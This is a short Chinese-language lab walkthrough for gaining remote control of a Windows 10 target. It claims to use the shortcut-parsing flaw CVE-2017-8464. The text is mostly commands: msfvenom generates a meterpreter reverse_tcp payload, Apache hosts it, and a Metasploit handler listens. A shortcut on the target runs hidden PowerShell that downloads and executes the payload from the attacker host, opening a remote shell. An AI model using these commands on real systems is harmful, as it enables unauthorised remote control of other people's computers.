-
搭建Kali攻击机,ip地址为192.168.88.136。当Windows系统在解析powershell快捷方式时,存在远程执行任意代码的漏洞(CVE-2017-8464)。
-
生成攻击文件<search.ps1> msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.136 lport=5555 -f psh-reflection > /var/www/html/search.ps1
-
开启Apache服务 service apache2 start
-
开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp (和攻击文件使用的payload一样)
set lhost 192.168.88.136
set lport 5555
run
-
在win10靶机创建快捷方式 powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.88.136/search.ps1‘);test.ps1"。
-
双击快捷键,成功返回到metasploit上一个session 输入shell,就可以控制靶机了